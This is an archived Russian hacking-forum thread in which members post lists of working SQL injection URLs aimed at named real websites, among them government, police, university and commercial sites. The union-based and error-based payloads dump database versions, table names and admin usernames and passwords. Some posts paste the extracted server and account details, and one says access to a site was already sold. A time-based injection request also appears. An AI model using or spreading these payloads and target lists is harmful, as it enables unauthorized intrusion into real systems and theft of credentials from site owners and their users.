Просмотр полной версии : SQL Инъекции
http://
www.gatewayautogates.com/gate.php?id=41+or+1+group+by+concat((select+versio n()),0x00,floor(rand(0)*2))+having+min(0)--
==========================================
http://
medyal.ru/base.php?id=-30+union+select+1,2,3,group_concat(table_name)+fro m+information_schema.tables+where+table_schema=dat abase()
==========================================
http://
ars36.ru/scutervelo-velo.php?id=-506+union+select+1,2,3,4,version(),6,group_concat( name,0x3a,pass),8,9,10+from+userlist--
==========================================
http://
www.bdbatteries.com/buss-bars.php?id=-300+union+select+1,2,group_concat(table_name),4+fr om+information_schema.tables+where+table_schema=da tabase()--
==========================================
Code:
http://www.witchcraft.nu/newsitem.php?id=-330+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11--
http://
www.esteticaynegocios.com.ar/ver.php?id=-527+union+select+group_concat(username,0x3a,passwo rd),2,3,4+from+foro_username--
==========================================
http://
www.tranzeo.com/investors/press.php?id=133'+or+1+group+by+concat((select+ver sion()),0x00,floor(rand(0)*2))+ having +min(0)+--+
==========================================
http://
www.bna-inc.com/about.press.php?id=59'+or+1+group+by+concat((selec t+version()),0x3a,database(),0x3a,user(),floor(ran d(0)*2))+having+min(0)+--+
==========================================
http://www.gucunparkhotel.com/en/about.php?id=-59+union+select+1,@@version,3,4,5
и
http://www.ipt.com.ua/about.php?id=-59+union+select+version()
http://
www.dmch.edu/HOD.php?id=45'+or+1+group+by+concat((select+versio n()),0x3a,database(),0x3a,user(),floor(rand(0)*2)) +having+min(0) +--+
==========================================
http://
www.geca.ac.in/departments/hod.php?id=-14+union+select+1,2,3,4,concat_ws(0x3a,user_name,p ass_word),version(),7,8,9 from admin_login--
==========================================
Win32BOT
04.06.2013, 16:15
Code:
http://banki.volgograda.ru/index.php?do=-123+union+select+1,2,user(),database(),5,6,7,8,9,1 0,11,12,13,14,15,version()+--+
Win32BOT
04.06.2013, 18:43
Code:
http://encycl.anthropology.ru/article.php?id=1+union+select+1,user(),version(),d atabase(),5,6,7,8,9,10+--+
Code:
http://www.slavsandtatars.com/about.php?id=-25+union+select+user(),database(),version()+--+
Win32BOT
04.06.2013, 19:02
Code:
http://www.dittberner.com/reports/about.php?id=9999+union+select+1,2,version(),user( ),database(),6,7,8+--+
http://
www.balmoralia.com/conoce-zona.php?id=-3+union+select+group_concat(table_name)+from+infor mation_schema.tables+where+table_schema=database()--
==========================================
http://
www.freizeitkarte.at/gebiet.php?gebiet_id=56+or+1+group+by+conca((selec t+user()),0x3a,version(),0x3a,database(),floor(ran d(0)*2)) +having+min(0) --
==========================================
http://
www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,group_conca(userpwd,0x3a,user rights),version(),4,5+from+users--
==========================================
http://
www.ablasq.qc.ca/nouvelle.php?id=-62+union+select+1,2,group_concat(0x3a,table_name), 4,5,6,7,8+from+information_schema.tables+where+tab le_schema=database() --
==========================================
http://www.tergos.qc.ca/nouvelle.php?id=-16+union+select+1,2,database(),4,version(),6,7,8,9--
==========================================
Win32BOT
06.06.2013, 02:50
Code:
http://www.pangeaday.org/filmDetail.php?id=-+75+union+select+1,2,3,4,5,6,user(),8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23+--+
тиц 120
http://
www.expoconsta.ru/eng/news.php?nid=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(use r(),0x3a,version(),0x3a,database(),13,14 --
==========================================
http://
www.teberia.pl/news.php?id=-2160+union+select+1,2,version(),group_concat(table _name),5,6+from+information_schema.tables+where+ta ble_schema=database() --
==========================================
Code:
http://www.mof.gov.bt/news/news_detail.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9--
тиц 40
http://
lr4.latvijasradio.lv/post.php?id=62948+or+1+group+by+concat((select+ver sion()),0x3a,user(),0x3a,database(),floor(rand(0)* 2))+having+min(0)
==========================================
тиц 100
http://
www.buran-rus.ru/zap.php?id=-1+union+select+version() --
==========================================
тиц 120
http://
www.parts66.ru/contacts/?id=24+or+1+group+by+concat((select+version()),0x3 a,user(),0x3a,database(),floor(rand(0)*2))+having+ min(0)
==========================================
Улыбайся
10.06.2013, 09:49
http://adminpokrov.57ru.ru/news_view.php?id=-193+union+select+user(),version()--
http://
www.nmmotors.ru/index.php?page=auto_view&id=306'+or+1+group+by+concat((select+version()),0x 3a,user(),0x3a,database(),floor(rand(0)* 2))+having+min(0) --+
==========================================
http://
nifak.ru/index.php?id=10'+or+1+group+by+concat((select+vers ion()),0x3a,user(),0x3a,database(),floor(rand(0)*2 ))+having+min(0) --+
==========================================
Хостинг провайдер, 1200 пользователей
http://
www.genesismuds.com/clients/index.php?id=-490+union+select+1,2,3,4,5,version(),7,8,9,10,grou p_concat(table_name)from information_schema.tables where table_schema= database() --
==========================================
http://
www.yshm.com.cn/component.php?id=-3+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3 --
==========================================
http://
www.customcomputerconcepts.net/component.php?view=-5+union+select+1,version(),concat_ws(0x3a,login,pa ssword),4,5 from dr_adm --
==========================================
http://
www.finmansoftware.co.nz/index.php?id=114%27+union+select+1,2,3,4,group_con cat(table_name),6,7,8,9,10,11,12 from information_schema.tables where%20table_schema=database() --+
==========================================
http://
www.gardencentr.ru/catalog.php?s=-156'+union+select+concat(user(),0x3a,version(),0x3 a,database()) --+
==========================================
http://
www.specialfxcamera.com/content.php?id=-84+union+select+1,group_concat(username,0x3a,passw ord),3 from cms_users--
==========================================
http://
kostagas.ru/content.php?id=-37'+union+all+select+1,version(),group_concat(tabl e_name) from information_schema.tables where table_schema=database() --+
==========================================
http://
www.skpb.ru/content.php?id=-20'+union+all+select+version() --+
==========================================
http://
www.stb01.ru/content.php?id=-3'+union+select+1,version(),3 --+
==========================================
http://
garantkuban.com/content.php?id=-24'+union+select+1,version() --+
==========================================
Парни не спим...
PHP:
http://www.recordmakers.com/artist.php?id=-10+union+select+1,2,3,4,5,6,7,8,9,version(),11,12--+
++$3x++
PHP:
http://zakazdiplom.ru/show_cat.php?subj=-32+union+select+version()--
++$3x++
PHP:
http://www.verav.ru/common/magazin.php?num=-5+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18--
++$3x++
PHP:
http://www.avenuenamericankitchen.com/reviews.php?num=-10+union+select+1,2,3,4,5,6,version(),8,9,10,11,12 ,13,14,15,16--
++$3x++
PHP:
http://www.lesanesagilles.com/fiche-ane.php?NUM=-10+union+select+1,version(),3,4,5,6,7,8--
PHP:
http://www.tourtahlequah.com/business.php?bid=-93+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
++$3x++
PHP:
http://www.bloombaby.ru/collection/main.php?sID=-41+union+select+version()--
++$3x++
PHP:
http://brunswickgp.ru/brunswickgp/viewresults.php?sid=-111+union+select+version(),2,3,4,5--
++$3x++
PHP:
http://tofi.dn.ua/reklama.php?idr=-1+union+select+1,2,3,version()--
++$3x++
PHP:
http://www.sp-antiques.com/web/products.php?c=-5+union+select+1,version(),3--
++$3x++
PHP:
http://www.robotcoupeusa.com/products/product-list.php?c=-5/**/union/**/all/**/select/**/1,concat_ws(user(),database(),version()),3--
Улыбайся
18.06.2013, 11:54
==========================================
http://www.mirloterei.ru/index.php?id=-20'+union+select+1,2,3,database(),@@version,6,7,8+--+
==========================================
Code:
http://bbyloosediamonds.com/pages.php?id=-5+union+select+1,version(),3,4,5,6,7,8,9--
http://
pitaniedetym.ru/content.php?id=-6+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user() ,version(),database()) --
==========================================
http://
akkad.by/s_cat.php?id_part=161+union+select+1,2,3,group_con cat(_name,0x3a,_pas),5,6,7,8 from _akk -- &id_ph=4
==========================================
http://
business-biz.ru/consulting_cat.php?id=-17+union+select+1,group_concat(user,0x3a,pass),3,4 ,5,6 from userlist --
==========================================
http://
gskelit.ru/cat.php?id=-129'+union+all+select+1,2,group_concat(mail,0x3a,f io),4 from mail --+
==========================================
http://
7digit.ru/cat.php?id=-110+or+1+group+by+concat((select+version()),0x3a,u ser(),0x3a,database(),floor(rand(0)*2))+having+min (0) --+
==========================================
http://
carldavey.co.uk/product.php?id=-2/*!union*/+/*!select*/+1,version(),/*!group_concat(table_name)*/,4,5,database(),7,8,9,10 +/*!from*/+/*!information_schema.tables*/+/*!where*/+/*!table_schema=database()*/
==========================================
http://
lightspeedoutdoors.com/product.php?id=-18+union+select+1,version%28%29,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,group_concat(table_na me) from information_schema.tables where table_schema=database() --+
==========================================
Улыбайся
22.06.2013, 13:08
=================
http://www.plakitina.ru/uroki-risovanija-maslom.php?id=-69+union+select+database()+--+
уязвимое поле content=
=================
http://www.trezvie.ru/view_article.php?id=-36'+union+select+1,database(),3,4,5,version()+--+
=================
http://www.wannawin.ru/articles.php?id=-34'+union+select+1,database(),version(),4+--+
=================
http://
www.aircoach.ie/news.article.php?ID=251'+union+select+1,2,3,4,5,ve rsion(),7,8,9,10,11,concat(user,char(58),pass),13, 14,15,16,17,18,19,20 from users --+
==========================================
http://
www.silverfoxseniors.org/news/article.php?id=-11'+union+select+1,version(),group_concat(table_na me),4 from information_schema.tables where table_schema=database() --+
==========================================
http://
www.drusvoice.com/news/article.php?id=-101'+union+select+1,version(),group_concat(table_n ame),4,5 from information_schema.tables where table_schema=database() --+
==========================================
Улыбайся
23.06.2013, 15:21
=================
http://www.numismat.ru/article.shtml?id=-11+union+select+database(),version(),user()+--+
http://www.mrkfish.ru/paper?id=-71+union+select+1,version(),database(),4,5,6+--+
=================
Code:
http://www.kingsarmssalford.com/details.php?show_id=-602+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
В базе есть юзер co знакомым Всем ником dood
http://
allidamaale.com/article.php?id=3736'+union+select+1,2,3,4,version( ),6,7,group_concat(unhex(hex(username)),0x3a,unhex (hex(password))),9 from users +--+
==========================================
В ногу с прогрессом
http://
footfuture.net/article.php?id=-27+union+select+1,group_concat(username,0x3a,passw ord),3,version(),5,6 from modx_manager_users --
==========================================
pyatoe.ru
PHP:
http://pyatoe.ru/about/news/?id=151+or+1+group+by+concat%28%28select+version%2 8%29%29,0x00,floor%28rand%280%29*2%29%29having+min %280%29+or+1--+
5.0.92-log
(CY) 10
(PR) 3
==============================================
http://
www.hooknbullet.com
/article.php?id=-1368+or+1+group+by+concat((select+version()),0x3a, user(),0x3a,database(),floor(rand(0)*2))+having+mi n(0)--+
==========================================
http://
www.supercar-news.com
/article.php?id=-139+union+select+1,concat(version(),char(58),datab ase(),char(58),user()) --+
==========================================
alleya.info
PHP:
http://www.alleya.info/pogoda/news_detail.php?id=-9+union+select+1,version%28%29,3,4--+
(CY) 140
(PR) 3
5.5.22
===============================================
http://
tours.ho.ua
/view_article.php?id=-10'+union+select+1,2,3,4,5,group_concat(login,char (58),password),7 from users --+
==========================================
http://
www.upnorthmag.com
/article.php?id=1882+or+1+group+by+concat((select+v ersion()),0x3a,user(),0x3a,database(),floor(rand(0 )*2))+having+min(0)--+
==========================================
http://
www.dtyd.co.za
/news_article.php?id=-15/*!union*//*!select*/1,2,3,version(),/*!group_concat(table_name)*/,6,7/*!from*//*!information_schema.tables*//*!where table_schema=database()*/ --+
==========================================
http://
www.iuc.hr
/conference-details.php?id=212+union+select+concat(version(),0 x3a,user(),0x3a,database()) --
==========================================
Win32BOT
27.06.2013, 02:37
Code:
http://regobraz.ru/statia.php?nm=99999+union+select+1,database(),3,ve rsion(),5,user(),7,8,9+--+
http://
www.tallyimmobilien.be
/detail.php?id=-353+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,group_concat(table_name),15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from information_schema.tables where table_schema=database() --+
==========================================
http://
www.ipr2.org
/ipsearch/more.php?id=-15+union+all+select+1,version(),group_concat(usern ame,char(58),password),4,5,6,7,8,9,10,11+from+ipr_ user --
==========================================
http://
www.police.gov.bd
/index5.php?category=-186'+union+select+1,version(),3,4,5,6,group_concat (admin_name,char(58),admin_password),8,9+from+admi n--+
==========================================
nemaniak
29.06.2013, 03:27
thehimalayantimes.com PR-6 Alexa-49k
Code:
http://thehimalayantimes.com/featured/year2067/inner_blogs.php?newsid=-125'+UNION+SELECT+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+--+
Code:
5.0.77:himalayan1@localhost:thehimalayantimes_spec ial
http://met-profit.ru/forum/message.php?news=-21297+union+select+1,version(),3,4,5
http://
www.learning.pmi.org
/course-detail.php?id=-2216+union+select+1,group_concat(username,0x3a,pas sword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32+from+cms_u sers -- &pagenum=1
==========================================
http://
www.nickwakeling.org.au
/page.php?id=215'+and+1=2+union+select+1,2,version( ),4,group_concat(table_name),6,7,8+from+informatio n_schema.tables+where+table_schema=database() +--+
==========================================
тиц 950 доступ уже продавали (https://antichat.live/showthread.php/t/320647/)
http://
www.gipp.ru
/content.php?id=17'+union+select+1,concat(vcLogin,0 x3a,tPassword)+from+tblAdminUser --+
==========================================
http://
www.steptrading.nl
/dev/category.php?id=-240'+union+select+1,version(),3,group_concat(user_ login,0x3a,user_pass),5,6,7,8+from+wp_users--+
==========================================
http://
www.bloggingthemes.com
/template.php?id=-0020+union+select+1,2,concat(database(),0x3a,user( ),0x3a,version()),4,5,6,7--+
==========================================
http://
www.teledom.sk
/template.php?id=-56+union+select+1,concat(database(),0x3a,version() ,0x3a,user()),3,4,5,6,7 -- &idl=97
==========================================
pharm_all
03.07.2013, 17:14
едА!
EDU
http://www-crca.ucsd.edu/views.php?id=5 %SQL%
http://scriptures.byu.edu/gettalk.php?ID=1698 %SQL%
http://www.newsdesk.umd.edu/uniini/release.cfm?ArticleID=2671 %SQL ORACLE%
http://www2.cbe.csueastbay.edu/fac_page/final/index.php?id=308 %SQL%
http://www.salk.edu/insidesalk/articlenph.php?id=131 %SQL%
http://www.lssu.edu/hr/apjobsdesc.php?id=134 %SQL%
Code:
http://www.geospatialhealth.unina.it/main.php?idi=-6+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15--
http://
www.kituku.com
/article_template.php?id=-51'+union+select+1,2,group_concat(table_name),vers ion()+from+information_schema.tables+where+table_s chema=database() --+
==========================================
http://
www.inmobiliariagollan.com.ar
/index.php?id=-167+union+select+1,2,group_concat9table_name),4,5, 6,7,8,9,10,11,12,13+from+information_schema.tables +where+table_schema=0x676f6c6c616e325f646174617364--
==========================================
NeuroZnanie
04.07.2013, 17:42
GET /filter_edit.php?filter_id=1569887%20and%20benchmar k(20000000%2csha1(1))--%20&page_from=filters HTTP/1.1
Host: www.sape.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://www.sape.ru/filters.php
Cookie: {YourCookie}
Win32BOT
04.07.2013, 23:07
Code:
http://www.pushingpetals.com/buy.php?id=999999+union+select+1,user(),database() ,4,5,6,7,8,9,10,11,12+--+
==============================
Code:
http://www.prosto-kredit.ru/next.php?id=9999+union+select+user(),database()+--+
Win32BOT
05.07.2013, 00:44
HTML:
http://rossonka.by/say.php?id=-1558+union+select+1,user(),3,4,5,6,7,8,9,10,11,12, 13,14,15+--+
System User: rossonka_rossony@localhost
Sql Version: 5.0.96-community-cll-lve
Host Name: vh28.hosterby.com
Installation dir: /
Compile OS: unknown-linux-gnu
Current DB: rossonka_rns
DB User: 'rossonka_rossony'@'localhost'
Data Bases: information_schema
rossonka_rns
rossonka_tv
Win32BOT
05.07.2013, 02:09
add inj
Code:
http://www.mciti.ru/box.php?id=-3+union+select+1,user(),database(),version(),5,6,7 ,8,9,10,11+--+
======================================
Code:
ww.tecom.ru/phone.php?id=-1+union+select+1,group_concat(concat_ws(0x3b,user_ name,user_password)),3+from+cpg14x_users+--+
Пасы в открытом виде
http://
www.binicilik.org.tr
/news.php?id=369+and+1=2+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,group_concat(username,0x3a, userpass),version(),18,19,20,21+from+users --+
==========================================
http://
www.savorcalifornia.com
/template1.php?id=-196+union+select+1,group_concat(table_name),3,4,5, 6,7,8,9,10,11,12,13,141,5,16,17,18,19,20,21+from+i nformation_schema.tables+where+table_schema=databa se() --+
==========================================
http://
www.jamesgolfestates.com
/propertiestype.php?id=13+and+1=2+union+select+1,2, 3,group_concat(table_name),5+from+information_sche ma.tables+where+table_schema=database() --+
==========================================
Win32BOT
05.07.2013, 17:07
Code:
http://kyivstarstk.com.ua/template.php?id=-437+union+select+1,2,version(),4,5,6,7+--+
Host IP:62.149.9.101
Web Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e proxy_html/3.0.1 proxy_xml/0.1 PHP/5.2.9
Powered-by: PHP/5.2.9
DB Server: MySQL >=5
Sql Version: 5.0.67-log
Current DB: ks_stk
Host Name: i-free.colocall.com
Compile OS: portbld-freebsd7.1
Current User: ks_stk@localhost
Installation dir: /usr/local/
System User: ks_stk@localhost
DB User: 'ks_stk'@'localhost'
Data Bases: information_schema
ks_stk
stat
Win32BOT
05.07.2013, 17:18
Code:
http://humormillnews.com/hmill/read.php?id=-13+union+select+1,2,3,version(),database(),6,7,8,u ser(),group_concat(table_name),11+from+information _schema.tables+where+table_schema=database()+--+
==========================================
Code:
http://www.sourceisrael.com/read.php?id=-104+union+select+1,group_concat(table_name),databa se(),user(),5,6,7,version(),9,10,11+from+informati on_schema.tables+where+table_schema=database()+--+
==========================================
Code:
http://www.dhammaweb.net/Tipitaka/read.php?id=-1+union+select+1,2,database(),user(),version(),6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
==========================================
Code:
http://magla.name/joom/read.php?id=30+union+select+1,2,user(),4,database( ),version(),7,8,9,10,11,12,13,14,15,group_concat(t able_name),17,18,19+from+information_schema.tables +where+table_schema=database()+--+
==========================================
ТИЦ 140 PR 2
Code:
http://www.mzma.net/club/articles/read.php?id=-100+union+select+user(),version(),database(),4,5,g roup_concat(table_name)+from+information_schema.ta bles+where+table_schema=database()+--+
==========================================
Win32BOT
05.07.2013, 22:46
Code:
http://www.epileptologist.ru/contact.php?id=-1+union+select+1,2,user(),database(),group_concat( table_name),6+from+information_schema.tables+where +table_schema=database()+--+
==========================================
Code:
http://www.miss.kg/article.php?cat=-4+union+select+1,database(),3,4,5,6,group_concat(t able_name),8,9,10,11+from+information_schema.table s+where+table_schema=database()+--+
==========================================
Code:
http://www.dors.kz/article.php?id=7+union+select+1,2,database(),user( ),5+--+
Win32BOT
06.07.2013, 00:33
Code:
fikomed.ru/base.php?id=-8+union+select+1,2,database(),group_concat(table_n ame),5+from+information_schema.tables+where+table_ schema=database()+--+
==========================================
ТИЦ 20 PR 1
Code:
http://www.remonthat.ru/article.php?id=-2+union+select+1,2,database(),group_concat(table_n ame),5+from+information_schema.tables+where+table_ schema=database()+--+
Code:
http://www.tidytowns.ie/newsItem.php?id=-330+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,vers ion(),user(),database()),9,10,11,12,13,14--
Win32BOT
06.07.2013, 19:40
Code:
http://americanjewisharchives.org/exhibits/aje/details.php?id=-677+union+select+1,2,3,user(),database(),6,7,8,9,1 0,group_concat(table_name),12,13,14+from+informati on_schema.tables+where+table_schema=database()+--+
http://
www.capequarter.co.za
/details.php?id=-73'+union+select+1,2,group_concat(admin_username,0 x3a,admin_password),4,version(),6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21+from+admin_users --+
==========================================
Code:
http://www.stc.gov.ae/en/transport-intercity-routes-result.php?id=-112+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13--
Win32BOT
07.07.2013, 17:16
ТИЦ 20
PR 4
Code:
http://axss.ru/ind.php?pn=2&id_typ=-4+union+select+1,2,3,4,5,user(),group_concat(table _name),8,9,10,11,12,13,14,15,16,database(),18,19,2 0,21+from+information_schema.tables+where+table_sc hema=database()+--+
==========================================
ТИЦ 10
PR 2
Code:
http://board.sdaemkv.ru/ind.php?pn=3&id_categ=-6+union+select+1,2,3,4,5,6,user(),database(),9,10, 11,12,13,14,15,16,17,group_concat(table_name),19,2 0,21,22,23,24,25,26,27,28,29,30+from+information_s chema.tables+where+table_schema=database()+--+
==========================================
Code:
http://board.sbw.in.ua/ind.php?pn=1&id_typ=-165+union+select+1,2,3,4,5,6,user(),group_concat(t able_name),9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64+from+information_schema.t ables+where+table_schema=database()+--+
==========================================
ТИЦ 10
PR 2
Code:
old.sms-kavkaz.ru/ind.php?pn=0&id_categ=-3+union+select+version(),2,3,4,5,6,user(),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
==========================================
З.Ы.
Очень много скулей inurl:/ind.php?pn=
pharm_all
07.07.2013, 18:40
edu
EDU
http://dueprocesstv.rutgers.edu/episodes.php?id=346 %SQL%
http://www.northsouth.edu/php/faculty/list.php?type=Program&id=2&s_id=1 %SQL%
http://ofa.fas.harvard.edu/cal/loc.php?EventLocation=1 %SQL%
http://extension.oregonstate.edu/catalog/abstract.php?seriesno=2 %SQL%
http://www.financialaid.iastate.edu/scholarships/view.php?id=179 %SQL%
http://kasmana.people.cofc.edu/MATHFICT/mfview.php?callnumber=mf632 %SQL%
http://php.louisville.edu/a-s/cml/french/videos_french/show_video.php?id=10 %SQL%
Все рабочие, полные линки не публикую для школоты!
Win32BOT
07.07.2013, 19:17
Code:
http://www.dntconsult.kz/news.php?id=-21+union+select+1,database(),group_concat(table_na me),4,user(),6,7+from+information_schema.tables+wh ere+table_schema=database()+--+
Code:
http://www.shrishikshayatanschool.com/whatsnew-4.htm?sec=news&newsid=-153+union+select+concat_ws(0x3a,version(),user(),d atabase()),2,3,4--
Win32BOT
08.07.2013, 00:37
Code:
http://mlmusic.38th.ru/album.phtml?id=-309+union+select+group_concat(table_name),2,databa se()+from+information_schema.tables+where+table_sc hema=database()+--+
==========================================
Code:
http://lel.khv.ru/poems/resultik.phtml?id=-961+union+select+1,database(),user(),group_concat( table_name)+from+information_schema.tables+where+t able_schema=database()+--+
==========================================
Code:
http://promved.ru/articles/article.phtml?id=398&nomer=-15+union+select+1,database(),3,user()+--+
==========================================
ТИЦ 500 PR 5
Code:
http://www.yavlinsky.ru/news/index.phtml?id=-4404+union+select+1,2,3,4,user(),6,7,8,9,10,databa se(),group_concat(table_name),13,14,15,16,17,18,19 ,20,21,version(),23,24,25,26,27,28+from+informatio n_schema.tables+where+table_schema=database()+--+
Win32BOT
08.07.2013, 00:52
ТИЦ 170 PR 4
Code:
http://www.sovazs.com/shownews.phtml?id=-2073+union+select+1,2,3,4,group_concat(table_name) ,database(),7+from+information_schema.tables+where +table_schema=database()+--+
===========================================
Code:
http://foteco.ru/fotoemuls.phtml?id=-17+union+select+1,2,3,database(),group_concat(tabl e_name),6,7,8,9+from+information_schema.tables+whe re+table_schema=database()+--+
http://
www.resolutiondev.com
/content.php?id=-41+union+select+1,2,3,group_concat(username,0x3a,p assword),5,6,7+from+tbl_admin --
==========================================
Господа! Не забывайте про АнтиБоян (https://www.google.ru/)
Code:
Автор: Win32BOT | #15540 (/showpost.php?p=3537121&postcount=15540)
Уязвимый ресурс: fikomed.ru
повтор
12.06.2011, 15:58 (/showpost.php?p=2711412&postcount=13980)
Автор: Win32BOT | #15538 (/showpost.php?p=3536886&postcount=15538)
Уязвимый ресурс: mzma.net
Повтор
31.10.2010, 02:10 /showpost.php?p=2409039&postcount=13351
Уязвимый ресурс: dhammaweb.net
Повторы:
08.12.2012, 00:27 /showpost.php?p=3364494&postcount=15296
23.08.2010, 01:34 /printthread.php?t=21336&page=12806&pp=1
Уязвимый ресурс: sourceisrael.com
04.12.2011, 21:32 /printthread.php?t=21336&page=14496&pp=1
Автор: Win32BOT | #15533 (/showpost.php?p=3536468&postcount=15533)
Уязвимый ресурс: prosto-kredit.ru
Повтор
02.03.2009, 14:35 /showpost.php?p=1145629&postcount=8084
------------------------------------------------------------------------------------------
Автор: pharm_all | #15529 (/showpost.php?p=3535574&postcount=15529)
Уязвимый ресурс: lssu.edu
Повторы:
09.03.2007, 02:03 /printthread.php?t=21336&page=777&pp=1
30.10.2008, 11:06 /showpost.php?p=918180&postcount=6746
28.02.2009, 18:18 /showpost.php?p=1142036&postcount=8041
Уязвимый ресурс: newsdesk.umd.edu
Повторы:
07.08.2009 13:25 /printthread.php?t=21336&page=10328&pp=1
20.05.2007, 02:04 /showpost.php?p=367105&postcount=2240
30.05.2007, 17:41 /showpost.php?p=376345&postcount=2353
Уязвимый ресурс: crca.ucsd.edu
Повторы:
01.08.2007, 12:11 /showpost.php?p=426261&postcount=2797
31.05.2007, 02:39 forum.antichat.ru/printthread.php?t=21336&page=2360&pp=1
--------------------------------------------------------------------------------------
Автор: YaBtr | #15523 (/showpost.php?p=3531797&postcount=15523)
Уязвимый ресурс: norcotek.com
Повтор:
23.12.2012, 13:04 /showpost.php?p=3378579&postcount=15313
pr 5
http://
www.jewishhistory.org.il
/history.php?id=5874+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,(select(@x)from(select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))x),16,17,18,19,20,21,22,23 --+
==========================================
pr 2
http://
www.mustangdrive-in.com
/history.php?id=49+union+select+1,2,3,4,5,concat(da tabase(),0x3a,version(),0x3a,user()),7,8,9,10,11,1 2,13%20--
==========================================
Министерство энергетики и промышленности Кыргызской Республики
Code:
http://www.energo.gov.kg/site/index.php?act=poll_results&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10--
5.5.24-9-log 'energogovkg'@'%' energogovkg
http://www.6juin1944.com/assaut/amphib.php?id=-11+ union+select+1,2 ,version(),4,5,6,7,8--
5.1.66-0+squeeze1-log
http://www.speedofsound.dk/page.php?id=-11+un ion+select+1, user(),3,4,5,6,7--
MYSQLUSER18783@81.19.232.106
http://www.international.fon.rs/index_en.php?id=-11%20un ion+select+1,2,3,versio n(),5,6,7,8,9--
5.0.77-log
http://www.reklaamivabrik.ee/rus/index.php?subj=-5+union+se lect+1,2,3,4,5,versi on(),7--
5.1.49-log
http://www.persiantunedpiano.com/index.php?subj=-5+union+sel ect+1,2,3,4,5,6,ve rsion(),8--
5.1.53-log
http://www.spectradyn.com/index.php?subj=-5+union+ select+1,2,3,4,ver sion(),6--
5.5.32-log
http://capnbry.net/daoc/mobs.php?z=-10+union+sel ect+versi on()--
5.5.31-0ubuntu0.12.04.2
http://www.alchemypublishers.co.in/book_details.php?bid=-35/**/union/**/select/ **/1,concat_ws(user(),data base(),version())--
alchemdbalchemdb@182.50.130.215.0.96-log
http://www.bayfret.com/band_page.php?b=-10
/**/union/**/select/** /1,2,3, 4,5,concat_ws(user(),data base(),version()),7,8,9, 10,11,12,13,14,15,16,17--
BAYFRETBAYFRET@97.74.215.1955.0.96-LOG
http://www.sanadahoumotsukan.com/facilities/facility.php?n=-10
/**/union/**/select/**/1 ,concat_ws(user(),database(),version()),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19 ,20,21--
aa105k9h7u_utfaa105k9h7u@localhost5.5.14
http://www.sequoia.co.uk/shop/manufacturer_list.php?m=-10/**/union/**/select/**/1,2,3,4,concat_ws(user(),database(),version()),6,7 ,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28--
sequoia_shopsequoia_shop@localhost5.0.96-community
http://www.thesportingclub.com/staff-trainer-detail.php?m=-10/**/union/**/select/**/1,2,3,concat_ws(user(),database(),ve rsion()),5,6,7,8,9 ,10,11,12,13,14,15,16--
db_sdsports_comsdsportsadmin@mysql.tierra.net5.1.6 7-0ubuntu0.10.04.1-log 5, 3
http://www.napauk.org/artist.php?a=-10/**/union/**/sel ect/**/1,concat_ws(use r(),database(),version()),3,4,5,6
hillel845hillel845@10.1.3.1104.1.22
http://www.zohomusic.com/artists.php?a=-10/**/union/**/selec t/**/1,concat_ws(user(),database( ),version()),3,4,5,6,7,8--
zohomusi_zohomusiccomzohomusi_zohomus@localhost5.0 .96-community
http://www.juneauartistsgallery.com/artists.php?a=-10/**/union/**/sele ct/**/1,2,concat_ws(u ser(),database(),version())--
juneau_jagjaguser1@server265.com5.5.31-percona-sure1-log
http://www.powersoft2005.ru/list.php?g=-12/**/union/**/sele ct/**/1,2,concat_ws(user(),database(),v ersion()),4,5--
host1424_2host1424@localhost5.5.20-log
http://www.spectradyn.com/index.php?subj=4+and+1=2+union +select+1,2,3,4,v ersion(),6--
5.5.32-log
http://www.rigikulm.ch/index.php?id=-6+union+select+ 1,version(),3, 4,5--
5.0.21-community-nt
pharm_all
12.07.2013, 06:03
EDU\s
http://www.stanford[dot]edu/group/sjlsp/cgi-bin/orange_web/articles/index.php?CatID=1009 %SQL%
http://library.birzeit[dot]edu/librarya/bzu-ths/show_ths_category_en.php?catid=23%SQL%&src=0&catname=Education
http://help.isu[dot]edu/index.php?action=knowledgebase&catid=38&subcatid=67 %SQL%
